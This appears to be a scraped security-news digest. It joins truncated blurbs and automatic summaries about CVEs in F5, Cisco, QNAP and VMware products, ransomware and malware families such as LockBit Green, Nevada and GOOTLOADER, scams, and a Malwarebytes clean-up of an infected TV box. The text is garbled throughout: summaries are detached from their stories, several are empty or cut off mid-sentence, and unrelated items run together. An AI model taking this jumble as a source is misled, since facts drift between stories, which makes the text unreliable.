In those cases where the origin of the romance fraud was recorded, the initial approach by the scammer was made via social networks and dating apps, with Facebook accounting for over a third of all fraud cases: 35% Facebook 24% Tinder 21% Plenty of Fish 9% Match.com 3% Olderdating.com 3% Bumble 3% Instagram According to the research, all age groups are vulnerable to falling for a romance scam - with TSB saying it has refunded victims aged between 18 years old to 77. "Experts warn of a high-severity vulnerability that affects F5 BIG-IP that can lead to arbitrary code execution or DoS condition. A high-severity vulnerability in F5 BIG-IP, tracked as CVE-2023-22374, can be exploited to cause a DoS condition and potentially lead to arbitrary code execution. “A format string vulnerability exists in iControl SOAP that allows an […]
The post A High-severity bug in F5 BIG-IP can lead to code execution and DoS appeared first on Security Affairs.
"Autosummary:
The flaw affects the following versions of BIG-IP: F5 BIG-IP 17.0.0 F5 BIG-IP 16.1.2.2 – 16.1.3 F5 BIG-IP 15.1.5.1 – 15.1.8 F5 BIG-IP 14.1.4.6 – 14.1.5 F5 BIG-IP 13.1.5 “The most likely impact of a successful attack is to crash the server process. "Autosummary:
PowerShell script hiding inside the malicious add-in (Deep Instinct) In another example that involved a remote VSTO-based add-in, the threat actors set the .DLL payload to download a password-protected ZIP archive and drop it into the "%\AppData\Local\ folder." "Autosummary:
"Categories: Personal Tags: cybersecurity 101 Tags: online privacy 101 Are you smarter than a five-year-old? When it comes to online security and privacy, you should be. |
The post Cybersecurity and privacy tips you can teach your 5+-year-old appeared first on Malwarebytes Labs.
"Autosummary:
This gives you, the parent or guardian, the opportunity to review the app to see if it"s any good for them (Remember, dubious apps can still end up in these stores.). Though it"s hardly news that more and more children are being introduced to mobile computing devices like tablets, smartphones, and laptops at an early age, you may be surprised at what that age is. Kiddo doesn"t have a single social media account, but we"re already instilling in her the value of information related to her and, consequently, us. "“Can I tell a legitimate survey apart from a fake one?” is the single most important question you need to answer for yourself before taking any surveys online
The post Is that survey real or fake? How to spot a survey scam appeared first on WeLiveSecurity
"Autosummary:
Recipients are offered money, a gift card, a gadget (e.g., iPad/iPhone), entry to a sweepstake, money off their next purchase, or any number of non-existent prizes if they participate in the survey. Whether the scammers are looking to steal your passwords, credit card details or other information, install malware on your PC or another device, or add you to more spam mailing lists, it makes sense to understand what the risks are, and how to “separate the wheat from the chaff”.But … (e.g., iPad/iPhone), entry to a sweepstake, money off their next purchase, or any number of non-existent prizes if they participate in the survey. How to protect yourself With the above in mind, it makes sense to understand the tell-tale signs of a survey scam, what to do in order to stay safe and what should happen if you fall victim. Also, take the following steps to stay safe and secure: Don’t blindly trust survey offers , even if sent from a friend or family member. "Autosummary:
brask, brya, clapper, coral, dedede, enguarde, glimmer, grunt, hana, hatch, jacuzzi, kukui, nami, octopus, orco, pyro, reks, sentry, stout, strongbad, tidus, ultima, volteer, zork For those unfamiliar with RMA shims, they are disk images stored on USB devices that contain a combination of the ChromOS factory bundle components used to reinstall the operating system and manufacturer tools used to perform repair and diagnostics. "Anti-money laundering (AML) policies are getting stronger as countries crack down on any opportunity criminals might have to take advantage of services and resources to further their activity. The US has the Bank Secrecy Act, the Patriot Act, and Anti-Money Laundering Act of 2020, which promote cooperation and the use of sophisticated technology to combat financial crimes and the funding of terrorism. Especially noteworthy is that they’ve widened their nets over recent years so that … More
The post As the anti-money laundering perimeter expands, who needs to be compliant, and how? appeared first on Help Net Security.
"Autosummary:
The Financial Crimes Enforcement Network (FinCEN), the main regulating body in the US, even specifies what an obligated person means, namely: “An individual, a corporation, a partnership, a trust or estate, a joint stock company, an association, a syndicate, joint venture, or other unincorporated organization or group, an Indian Tribe (as that term is defined in the Indian Gaming Regulatory Act), and all entities cognizable as legal personalities.”First, let’s break down the entities this includes (but isn’t limited to): Banks Mutual funds Credit card systems operators Loan or finance companies Insurance companies Brokers or dealers in securities Futures commissions merchants Introducing brokers to commodities Money services (e.g., check issuers and cashers, foreign exchange dealers, prepaid access providers, money transmitters, virtual currency and wallet providers) AML regulating bodies want to see that your company has a complex program in place, combining automated and manual processes, that can constantly supervise customers, quickly spot suspicious activity, and report cases without delay. Read up on official requirements in detail, develop a realistic AML program that reflects your business and is easy for your team to maintain, and stay on top of your system’s performance, good or bad, and any regulation updates. But not all businesses are the same in terms of structure, services, and risks, so FinCEN and the Office of Financial Assets Control (OFAC) adapt their regulations for each sector and let companies within them develop their own compliance programs. "IT departments continue to face immense pressure to get vulnerability and patch management right as threat actors use new and old methods to exploit network endpoints. But are we ready for what’s next? As vulnerabilities continue to increase, what strategies should security professionals use to gain visibility into these threats, prioritize them, and manage the ongoing risk to endpoints? What will the vulnerability landscape look like in 2023, and what new challenges will security and … More
The post The future of vulnerability management and patch compliance appeared first on Help Net Security.
"Autosummary:
"77% of CIOs say their role has been elevated due to the state of the economy and they expect this visibility within the organization to continue, according to Foundry. “The CIO role is constantly evolving, and economic conditions have put a new level of pressure on these executives,” said Holly McWalter, Marketing & Research Specialist, Foundry. “This year’s research showcases how this pressure trickles down to important decisions regarding priorities and budget, and provides insight … More
The post 70% of CIOs anticipate their involvement in cybersecurity to increase appeared first on Help Net Security.
"Autosummary:
When asked how the state of the economy has impacted the way their organization is prioritizing business initiatives, the following have increased in priority – increasing operational efficiency (58%), increasing cybersecurity protections (58%), transforming existing business processes (54%), improving profitability (54%), and improving the customer experience (49%). "ThreatSpike Red helps organisations of all sizes to close the cybersecurity gap by providing continuous unlimited testing and scanning of applications and websites to identify vulnerabilities. The new managed service is giving customers full visibility over cost, and makes advanced offensive cybersecurity accessible to more organizations large and small. Compared to conventional pentesting conducted once or twice per year, ThreatSpike Red enables customers to undertake continuous cybersecurity evaluation, achieving greater depth through red team exercises … More
The post ThreatSpike Red makes offensive cybersecurity accessible to more organizations appeared first on Help Net Security.
"Autosummary:
Adam Blake, CEO of ThreatSpike, explains, “In today’s challenging digital environment offensive cybersecurity shouldn’t be just a point-in-time activity, but the high cost of traditional pentesting services means most organisations can only afford to test infrequently, if at all. "Autosummary:
"Researchers from Resecurity have identified a new version of Nevada Ransomware which recently emerged on the Dark Web right before the start of 2023. Resecurity, California-based cybersecurity company protecting Fortune 500 globally, has identified a new version of Nevada Ransomware which recently emerged on the Dark Web right before the start of 2023. The actors […]
The post <strong>Nevada Ransomware Has Released Upgraded Locker</strong> appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Nevada Ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "TrickGate is a shellcode-based packer offered as a service to malware authors to avoid detection, CheckPoint researchers reported. TrickGate is a shellcode-based packer offered as a service, which is used at least since July 2016, to hide malware from defense programs. A packer (aka “Crypter” and “FUD”) implements a series of functionalities to make it harder for […]
The post TrickGate, a packer used by malware to evade detection since 2016 appeared first on Security Affairs.
"Autosummary:
The Check Point Research team reported that over the last 6 years, TrickGate was used to drop some of the most popular malware families, including Cerber, Trickbot, Maze, Emotet, REvil, Cobalt Strike, AZORult, Formbook, and AgentTesla. "Autosummary:
LNK file (Screenshot.jpg) properties (Security Joes) Security Joes researchers say that the downloaded malware is "a highly complex compiled JavaScript file" that can discover running processes, steal passwords, cookies, and files, open a proxy tunnel for the attacker, as well as run scripts retrieved from the attackers" server. Port.exe file properties (Security Joes) Upon further analysis, Security Joes figured that the sample is a previously unseen module backdoor written in Node.js, providing threat actors with the following capabilities: Customization via plugins that extend the malware"s built-in features. "Autosummary:
Sophos observed such a campaign from a China-based threat group named "ShaZhuPan," which shows high organizational levels with distinct teams doing victim interaction, finance, franchise, and money laundering. "Autosummary:
The closure pulls many resources, such as workshops, events, mentorship opportunities, and access to a community of like-minded individuals, along with weakening UK growth for cybersecurity startups and incubated entities, Cunningham adds. Tech Nation “not viable” without vital government funding In a post on its website, Tech Nation stated that it has exhaustively explored whether it could continue without core government grant funding, but has concluded, after extensive consultation, that this is not an option. Whilst there is no doubt Tech Nation has made a positive impact over the last decade, the majority of similar, government-funded projects are expected to be self-funding over time, says Brian Higgins, security specialist at Comparitech. "Autosummary:
"Autosummary:
The Google-signed shim image is a "combination of existing Chrome OS factory bundle components" – namely a release image, a toolkit, and the firmware, among others – that can be flashed to a USB drive. "Lockbit ransomware operators have released a new version of their malware, LockBit Green, that also targets cloud-based services. Lockbit ransomware operators have implemented a new version of their malware, dubbed LockBit Green, which was designed to include cloud-based services among its targets. This is the third version of the ransomware developed by the notorious gang, […]
The post New LockBit Green ransomware variant borrows code from Conti ransomware appeared first on Security Affairs.
"Autosummary:
The hashes and YARA rule can be found here: 👉https://t.co/0A9waHAwZj#lockbit #ransomware — PRODAFT (@PRODAFT) January 30, 2023 Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, LockBit green) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Cisco has released patches for a high-severity vulnerability (CVE-2023-20076) found in some of its industrial routers, gateways and enterprise wireless access points, which may allow attackers to insert malicious code that can’t be deleted by simply rebooting the device or updating its firmware. “In this case, the command injection bypasses mitigations Cisco has in place to ensure vulnerabilities do not persist in a system. Side-stepping this security measure means that if an attacker exploits this … More
The post Vulnerability in Cisco industrial appliances is a potential nightmare (CVE-2023-20076) appeared first on Help Net Security.
"Autosummary:
IOS XE-based devices configured with IOx (i.e., routers capable of running third-party apps inside of a containerized environment Cisco Catalyst Access points (wireless access point for enterprise environments with a high number of connected devices) IR510 WPAN Industrial Routers (wireless routers smart factories and smart grids) CGR1000 Compute Modules (for enterprise cloud services) There are no workarounds available. "Authors of the Prolex PoS malware improved their malicious code to target contactless credit card transactions. The threat actors behind the sophisticated point-of-sale (PoS) malware Prilex have have improved its capabilities to block contactless payment transactions. Researchers from Kaspersky Lab discovered three new versions of the PoS malware designed to target credit cards using NFC technology. […]
The post New Prilex PoS Malware evolves to target NFC-enabled credit cards appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Prilex PoS malware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
This week, cybersecurity collective VX-Underground first reported that the ransomware gang is now using a new encryptor named "LockBit Green," based on the leaked source code of the now-disbanded Conti gang. "Autosummary:
"Autosummary:
Google clarified that the breached systems did not hold sensitive details such as full names, email addresses, payment card information, SSNs, tax IDs, government IDs, account passwords, or contents of SMS and phone calls. "Autosummary:
Targeting Windows hosts The Nevada ransomware variant that focuses on Windows machines is executed via console and supports a set of flags that give its operators some control over the encryption: -file > encrypt selected file -dir > encrypt selected directory -sd > self delete after everything done -sc > delete shadow copies -lhd > load hidden drives -nd > find and encrypt network shares -sm > safe mode encryption One interesting characteristic of Nevada ransomware is the set of system locales it spares from the encryption process. "Autosummary:
"Autosummary:
"Autosummary:
To defend their Redis servers, admins are advised to ensure that only clients within their networks can access them, to disable the "slaveof" feature if it"s unused, and enable protected mode, which configures the instance to only respond to the loopback address and refuse connections from other IP addresses. "Categories: Threat Intelligence Our Threat Intelligence team looks at known ransomware attacks by gang, country, and industry sector in December 2022, and looks at why LockBit had to make a public apology |
The post Ransomware in December 2022 appeared first on Malwarebytes Labs.
"Autosummary:
Posted: February 1, 2023 by Our Threat Intelligence team looks at known ransomware attacks by gang, country, and industry sector in December 2022, and looks at why LockBit had to make a public apology Malwarebytes Threat Intelligence builds a monthly picture of ransomware activity by monitoring the information published by ransomware gangs on their dark web leak sites. Known ransomware attacks by industry sector in December 2022 Known ransomware attacks by country in December 2022 In terms of progress, the two newcomers that we introduced last month, Play and Project Relic, have vastly different stories to tell. "Utility infrastructure is in dire need of modernization. In many parts of the world, the infrastructure delivering power and water to consumers is not ready to withstand natural disasters and rising energy demands. Integrating real-time data analytics into the decision-making process is one way to kick start modernization efforts, yet nearly one in five utilities are not making use of the tools they have due to security and data privacy concerns, according to Itron’s 2022 … More
The post 3 ways to stop cybersecurity concerns from hindering utility infrastructure modernization efforts appeared first on Help Net Security.
"Autosummary:
Standard defenses—multi-factor authentication, role-based access controls, internal audit processes, spam filters, preventing Microsoft Office macros, endpoint detection and response, data loss prevention solutions, etc.—go a long way to making it easier for employees to make the right decisions and tougher for bad actors to get in.Other security considerations include aging OT, which can be challenging to update and to protect, the lack of control over third-party technologies and IoT devices such as smart home devices and solar panels, and finally, the biggest threat of all: human error.Integrating real-time data analytics into the decision-making process is one way to kick start modernization efforts, yet nearly one in five utilities are not making use of the tools they have due to security and data privacy concerns, according to Itron’s 2022 Resourcefulness Report. "In this Help Net Security video, Kurtis Minder, CEO of GroupSense, discusses President Biden’s National Cybersecurity Strategy, designed to take the nation’s cybersecurity posture to the next level. While the strategy promises to make it much easier for government agencies to launch offensive cyberattacks on adversaries, it betrays why the U.S. has fallen behind modern cyber threats. It’s important to remember that the U.S. started serious offensive cyber operations with Stuxnet in 2010. Since then, … More
The post Is President Biden’s National Cybersecurity Strategy a good idea? appeared first on Help Net Security.
"Autosummary:
"49% of organizations have sufficient budget to fully meet their current cybersecurity needs, and 11% can, at best, protect only their most critical assets, according to a survey by the Neustar International Security Council. Despite the rapidly changing threat landscape, 35% of information technology and security professionals responding to the survey said their organization’s cybersecurity budget would remain the same or decrease in 2023, and 44% of these individuals believe their business will be more … More
The post Budget constraints force cybersecurity teams to do more with less appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"QNAP Systems has fixed a critical vulnerability (CVE-2022-27596) affecting QNAP network-attached storage (NAS) devices, which could be exploited by remote attackers to inject malicious code into a vulnerable system. Luckily for QNAP NAS owners, there’s no mention of it being exploited by attackers or an exploit being publicly available. About CVE-2022-27596 QNAP’s advisory does not offer more details about CVE-2022-27596, but the vulnerability entry in NIST’s National Vulnerability Database reveals that the flaw may allow … More
The post Critical QNAP NAS vulnerability fixed, update your device ASAP! (CVE-2022-27596) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Any country with a nexus to the Ukraine crisis, particularly those with key geopolitical, economic, or military relationships with Russia or Ukraine, are at increased risk of targeting," the company said in a technical report published last week. "Autosummary:
"Autosummary:
VMware also fixed a deserialization vulnerability (CVE-2022-31710) which triggers denial of service states, and an information disclosure bug (CVE-2022-31711) that attackers can use to gain access to sensitive session and application info. "Autosummary:
Two of the apps were named "Single Sign On (SSO)," and the third one was called "Meeting," requesting access to the following permissions: Read your mail Maintain access to data you have given it access to Read your mailbox settings Sign you in and read your profile Send mail as you Read your calendars Read your online meetings Unfortunately, Proofpoint saw evidence of multiple users impacted by the attacks, resulting in the compromise of their organizations. "Autosummary:
"Some of the most prominent ransomware payloads in recent campaigns include Lockbit Black, BlackCat (aka ALPHV), Play, Vice Society, Black Basta, & Royal," Microsoft said. "Autosummary:
Kaspersky, following the Prilex PoS malware closely, reports seeing at least three new variants in the wild, with version numbers 06.03.8070, 06.03.8072, and 06.03.8080, first released in November 2022. "Horizon3 security researchers released proof-of-concept (PoC) code for VMware vRealize Log Insight RCE vulnerability CVE-2022-31706. Last week, researchers from Horizon3’s Attack Team announced the release of PoC exploit code for remote code execution in VMware vRealize Log tracked as CVE-2022-31706 (CVSS base 9.8/10). The PoC exploit code will trigger a series of flaws in VMware […]
The post Experts released VMware vRealize Log RCE exploit for CVE-2022-31706 appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, VMware vRealize Log Insight) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"The expansion of potential cyber threats has increased due to the integration of connected devices, the Internet of Things (IoT), and the convergence of IT and OT in railway operations. In this Help Net Security interview, Dimitri van Zantvliet is the Cybersecurity Director/CISO of Dutch Railways, and co-chair to the Dutch and European Rail ISAC, talks about cyber attacks on railway systems, build a practical cybersecurity approach, as well as cyber legislation. The railroad industry … More
The post Mounting pressure is creating a ticking time bomb for railway cybersecurity appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, Dimitri van Zantvliet is the Cybersecurity Director/CISO of Dutch Railways, and co-chair to the Dutch and European Rail ISAC, talks about cyber attacks on railway systems, build a practical cybersecurity approach, as well as cyber legislation. Develop a security strategy: Based on the results of your risk assessment, develop a comprehensive security strategy that includes an Information Security Management System (ISMS), policies, procedures, and controls to protect against identified threats.It depends a bit on the Purdue level this asset is working in, but some of the ways to address this issue include: Network segmentation: logically isolate them from the rest of the network, so that if an attacker does manage to compromise the system, they will not be able to move laterally to other parts of the network. In general, I believe that requiring institutions, groups, and companies whose service interruptions might jeopardize the economy or public security to report cyber incidents is a positive step towards improving the security of our critical infrastructure. "SynSaber recently released its second Industrial Control Systems (ICS) Vulnerabilities & CVEs Report. In this Help Net Security video, Ronnie Fabela, CTO at SynSaber, talks about the key findings: For the CVEs reported in the second half of 2022, 35% have no patch or remediation currently available from the vendor (up from 13% in the first half of the year) While 56% of the CVEs have been reported by the Original Equipment Manufacturer (OEM), 43% … More
The post ICS vulnerabilities: Insights from advisories, how CVEs are reported appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"The threat actors behind the GOOTLOADER malware continues to improve their code by adding new components and implementing new obfuscation techniques. Mandiant researchers reported that the UNC2565 group behind the GOOTLOADER malware (aka Gootkit) continues to improve their code by adding new components and implementing new obfuscation techniques. Gootkit runs on an access-a-as-a-service model, it is used […]
The post UNC2565 threat actors continue to improve the GOOTLOADER malware appeared first on Security Affairs.
"Autosummary:
“This new variant has been observed trojanizing several legitimate JavaScript libraries, including jQuery, Chroma.js, and Underscore.js” Upon successful execution of the GOOTLOADER file, additional payloads are downloaded, including FONELAUNCH and Cobalt Strike BEACON or SNOWCONE that will be stored in the registry.Payload (See Infection Chain) GOOTLOADER GOOTLOADER GOOTLOADER.POWERSHELL “Beginning in November 2022, Managed Defense observed a new obfuscation variant, tracked as variant 3, with modified infection that is more complex than the previous variants. Mandiant researchers observed the UNC2565 group adopting three obfuscation techniques, such as hiding the code within altered versions of legitimate JavaScript libraries such as jQuery, Chroma.js, and Underscore.js, in an attempt to evade detection. "Autosummary:
Some of the major web browsers targeted by Titan Stealer include Google Chrome, Mozilla Firefox, Microsoft Edge, Yandex, Opera, Brave, Vivaldi, 7 Star Browser, Iridium Browser, and others. "Autosummary:
"Autosummary:
"Autosummary:
" The hacker, maia arson crimew, previously known by aliases deletescape, antiproprietary, and Tillie Kottmann, was earlier indicted by a U.S. grand jury over conspiracy, wire fraud, and aggravated identity theft charges (PDF). Interestingly, the list discovered in 2021 by Diachenko was rather detailed: containing fields such as names, gender, passport number along with the country of issuance, TSC ID, watchlist ID, etc. compared to the one published on the forum this month.The list is, however, referenced by private airlines and multiple agencies such as the Department of State, Department of Defense, Transportation Security Agency (TSA), and Customs and Border Protection (CBP) to check if a passenger is allowed to fly, inadmissible to the U.S. or assess their risk for various other activities. "Autosummary:
"ESET researchers have discovered yet another wiper malware used to target Ukrainian organizations. Dubbed SwiftSlicer, it is thought to be wielded by the Sandworm APT. Simultaneously, the Ukranian CERT has confirmed that the attackers who recently aimed to disrupting the operation of the National News Agency of Ukraine (Ukrinform) used various wiper malware and one legitimate Windows command line utility to try to “destroy” machines running different operating systems. They believe the Sandworm team was … More
The post A glut of wiper malware hits Ukrainian targets appeared first on Help Net Security.
"Autosummary:
Wipers target Ukraine Fortinet security researcher Geri Révay recently recapped last year’s “explosion” of wiper malware, and made / reiterated a few interesting points: Ransomware can serve as a wiper, if attackers can’t share the decryption key Wipers can masquerade as ransomware Wipers for OT environments are a thing The growth in wiper malware during a conflict is to be expected, as its main function is destruction, and most of the new wipers detected in 2022 were aimed at Ukrainian organizations Earlier this month, CERT-UA fended off the cyberattack against Ukrinform and limited its destructive effect to some parts of the agency’s information infrastructure – “a limited number of data storage systems,” according to the State Special Communications Service of Ukraine. "A researcher disclosed technical details of a two-factor authentication bypass vulnerability affecting Instagram and Facebook. The researcher Gtm Manoz received a $27,000 bug bounty for having reported a two-factor authentication bypass vulnerability affecting Instagram and Facebook. The flaw resides in a component used by the parent company Meta for confirming a phone number and email […]
The post Researcher received a $27,000 bounty for 2FA bypass bug in Facebook and Instagram appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Facebook) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Please note that an enforced configuration file only applies to the KeePass program in the same directory," the KeePass development team says, "If the user runs another copy of KeePass without an enforced configuration file, this copy does not know the enforced configuration file that is stored elsewhere, i.e. no settings are enforced." "Sports fashion retail JD Sports discloses a data breach that explosed data of about 10M customers who placed orders between 2018 and 2020. UK sports fashion chain JD Sports disclosed a data breach that exposed customer data from orders placed between November 2018 and October 2020. The company discovered unauthorized access to a server that contained […]
The post JD Sports discloses a data breach impacting 10 million customers appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, data breach) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
While this account linked to Porsche"s real Discord channel, it also linked to a malicious site ("porsche-nfts.com") that"s visually a clone of Porsche"s genuine NFT portal at "nft.porsche.com." Real site is on the left, fake site on the right (BleepingComputer) While the actual site has a notice about the minting closure, the fake one pretends that the procedure is still underway, inviting users to link their wallets. "Categories: Android Categories: Threat Intelligence Find out why one of our Android experts has been obsessing over a little black box from Amazon. |
The post Analyzing and remediating a malware infested T95 TV box from Amazon appeared first on Malwarebytes Labs.
"Autosummary:
First, you need to gain root access: adb root Now, enter shell: adb shell From shell, check to confirm that Corejava exists (the output will tell you): test -d /data/system/Corejava/ && echo "You are infected with Corejava!!!"com.swe.dgbluancher If, for whatever reason, you need to revert to DGBLuancher, here’s the command: adb shell pm install -r --user 0 /system/priv-app/Launcher10/Launcher10.apk Note that the above pm uninstall command uses -k to quote "keep the data and cache directories around after package removal", and --user 0 to only uninstall for the current user.Using the command touch , create an empty file named Corejava in /data/system : touch /data/system/Corejava Next, change the permissions so nothing can modify it: chmod 000 /data/system/Corejava This last step is key. busybox chattr +i /data/system/Corejava With these settings in place, whenever the system tries to create /data/system/Corejava , it will be denied as seen in the output from logcat | grep Corejava run in shell: FileUtils: Failed to chmod(/data/system/Corejava): android.system. With your comptuer connected to the T95 TV box, open a terminal (this is Command Prompt on Windows) and type: adb devices There should be an ID number followed by the word device under List of devices attached, for example: List of devices attached 12345c3006c0c721d0e device Now you are ready to remediate some nasties! Corejava classes.dex"s code contained a lot of references to using internet traffic: GET commands, POST commands, HTTP, HTTPS, etc.For example, all your app icons, widgets, clock, getting to Settings, etc. To factory reset the T95: Go to the Gear icon for the settings screen Navigate to More Settings Navigate to Device Preferences Scroll down to bottom and press Reset Read the warning, and proceed with Reset if you"re willing to go ahead After the reset, do not connect the T95 TV box to a network just yet. With this information, I did everything from analyzing system level bash scripts on the device, looking for keywords such as Corejava within every file, to uninstalling apps to see if it resolved.That starts with removing /data/system/Corejava/ and anything in it: rm -rf /data/system/Corejava Now that it"s gone, we need to stop it from every coming back.Because "a file with the "i" attribute cannot be modified: it cannot be deleted or renamed, no link can be created to this file, most of the file"s metadata cannot be modified, and the file cannot be opened in write mode."Every app, which is called an Android Package Kit (APK) on Android, contains a classes.dex file, along with other directories and files required for the classes.dex to load and run. Exploring the network traffic When I am looking into network traffic, my very first step is installing NoRoot Firewall, as referenced in the Toolset section above. "Categories: News Tags: Riot Games Tags: 2K Games Tags: Rockstar Games Tags: social engineering Tags: phishing The Riot Games breach saga continues. |
The post Riot Games refuses to pay ransom to avoid League of Legends leak appeared first on Malwarebytes Labs.
"Autosummary:
Motherboard was able to obtain a copy of the ransom email and partially shared the content with its readers, which we have replicated below: Dear Riot Games, We have obtained your valuable data, including the precious anti-cheat source code and the entire game code for League of Legends and its tools, as well as Packman, your usermode anti-cheat. "Autosummary:
"Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: BSidesZG 2023: Strengthening the infosec community in Croatia’s capital In March 2023, Zagreb will be added to the (already long) list of cities where information security professionals and enthusiasts can share their knowledge with peers at a Security BSides conference. We’ve talked with BSidesZG organizer Ante Jurjevic to find out what’s in store for those who attend. How to tackle … More
The post Week in review: ChatGPT cybersecurity, critical RCE vulnerabilities found in git, Riot Games breached appeared first on Help Net Security.
"Autosummary:
Critical VMware vRealize Log Insight flaws patched (CVE-2022-31706, CVE-2022-31704) VMware has fixed two critical (CVE-2022-31706, CVE-2022-31704) and two important (CVE-2022-31710, CVE-2022-31711) security vulnerabilities in VMware vRealize Log Insight, its multi-cloud solution for centralized log management, operational visibility and intelligent analytics. Why most IoT cybersecurity strategies give zero hope for zero trust In this Help Net Security video, Denny LeCompte, CEO at Portnox, discusses how IoT has been difficult to profile accurately and why zero trust strategies fail when applied to IoT. Understanding your attack surface makes it easier to prioritize technologies and systems Organizations need to strike the balance of carrying out enough due diligence before patching, and then patching as quickly as possible to defend themselves against emerging threats. "Horizon3’s Attack Team made the headlines again announcing the releasse of a PoC exploit code for remote code execution in VMware vRealize Log. Researchers from the Horizon3’s Attack Team announced the release of PoC exploit code for remote code execution in VMware vRealize Log. The PoC exploit code will trigger a series of flaws in […]
The post Watch out! Experts plans to release VMware vRealize Log RCE exploit next week appeared first on Security Affairs.
"Autosummary:
Exploitation of multiple vulnerabilities affecting #VMware vRealize Log Insight leads to unauth RCE 🔺 CVE-2022-31704, CVE-2022-31706, CVE-2022-31711 🔺 IOC Blog tomorrow 🔺 POC / Deep-Dive Blog next week See VMware Security Advisory: https://t.co/tldhMQPoPK pic.twitter.com/VesGlE8u5R — Horizon3 Attack Team (@Horizon3Attack) January 26, 2023 The PoC exploit code will trigger a series of flaws in VMware vRealize Log to achieve remote code execution on vulnerable installs. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @PolarToffee, @demonslay335, @LawrenceAbrams, @malwrhunterteam, @BleepinComputer, @Ionut_Ilascu, @Seifreed, @serghei, @struppigel, @billtoulas, @fwosar, @TrendMicro, @pcrisk, @1ZRR4H, @wdormann, and @ffforward. "Autosummary:
The sophistication of the threat actor is evidenced by its multiple distinct kill chains, which comprise a wide variety of custom tools such as BlackEnergy, GreyEnergy, Industroyer, NotPetya, Olympic Destroyer, Exaramel, and Cyclops Blink In 2022 alone, coinciding with Russia"s military invasion of Ukraine, Sandworm has unleashed WhisperGate, HermeticWiper, IsaacWiper, CaddyWiper, Industroyer2, Prestige, and RansomBoggs against critical infrastructure in Ukraine. "Autosummary:
VMware vRealize Log Insight unauth RCE exploit (Horizon3) "This vulnerability is easy to exploit however, it requires the attacker to have some infrastructure setup to serve malicious payloads," the researchers said. "Categories: News Categories: Ransomware Tags: DoJ Tags: FBI Tags: Europol Tags: HIve Tags: ransomware Tags: RDP Tags: Patch management Tags: Vulnerability Tags: phishing The DoJ, FBI, and Europol have released details about a months-long international disruption campaign against the Hive ransomware group |
The post Hive! Hive! Hive! Ransomware site submerged by FBI appeared first on Malwarebytes Labs.
"Autosummary:
Known attacks by ransomware gangs, based on data leaked since April 2022 In August 2021, the FBI published a warning about Hive ransomware, sharing tactics, techniques, and procedures (TTPs), indicators of compromise (IOCs), and mitigation advice. "Recent reports of Lockbit locker-based attacks against North European SMBs indicate that local crooks started using Lockbit locker variants. Executive Summary Incident Insights Recently, there has been a significant increase in ransomware attacks targeting companies in northern Europe. These attacks are being carried out using the LockBit locker, which is known to be in use […]
The post Copycat Criminals mimicking Lockbit gang in northern Europe appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Lockbit) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Iron Bow Technologies acquired GuardSight, a cybersecurity operations as a service (SECOPS), and managed detection and response (MDR) company that serves businesses and organizations across the U.S. The acquisition of GuardSight will enhance Iron Bow’s existing cybersecurity solutions portfolio, combining its public-sector cybersecurity engineering capabilities with GuardSight’s private-sector SECOPS and MDR capabilities. With GuardSight, Iron Bow will provide a more holistic cybersecurity offering that enables government agencies, private enterprises, and organizations to modernize their cybersecurity … More
The post Iron Bow acquires GuardSight to enhance its cybersecurity solutions appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"80% of organizations increased their use of open source software over the last 12 months, according to Perforce Software and the Open Source Initiative. Four out of five companies rely on OSS for a wide range of business-critical applications including data and database management, containers and container orchestration, and DevOps and SDLC tooling. The report reveals, however, that some obstacles persist. In every technology category surveyed, organizations repeatedly cited lack of personnel with expertise as … More
The post Open source skills continue to be in high demand appeared first on Help Net Security.
"Autosummary:
“Clearly, more technical support is needed for open source technologies, as personnel experience and proficiency is highly ranked again this year as a support concern across organizations regardless of size,” said Javier Perez, Chief OSS Evangelist at Perforce Software. "The BlackCat Ransomware group claims to have hacked SOLAR INDUSTRIES INDIA and to have stolen 2TB of “secret military data.” The BlackCat Ransomware gang added SOLAR INDUSTRIES INDIA to the list of victims published on its Tor leak site. The company is a globally recognised industrial explosives manufacturer, it provides complete blasting solutions, including packaged, […]
The post BlackCat Ransomware gang stole secret military data from an industrial explosives manufacturer appeared first on Security Affairs.
"Autosummary:
"Autosummary:
""Chuck," who uses multiple aliases for his underground forum, social media, and Jabber accounts, and the threat actor claiming to be from Moldova, have gone to great lengths to disguise themselves," eSentire researchers Joe Stewart and Keegan Keplinger said. "Autosummary:
The shortcut file, for its part, carries the same name as that of the USB device and appears as a drive icon, with the existing files or directories on the root of the removable device moved to a hidden folder created inside the "shortcut" folder. "Autosummary:
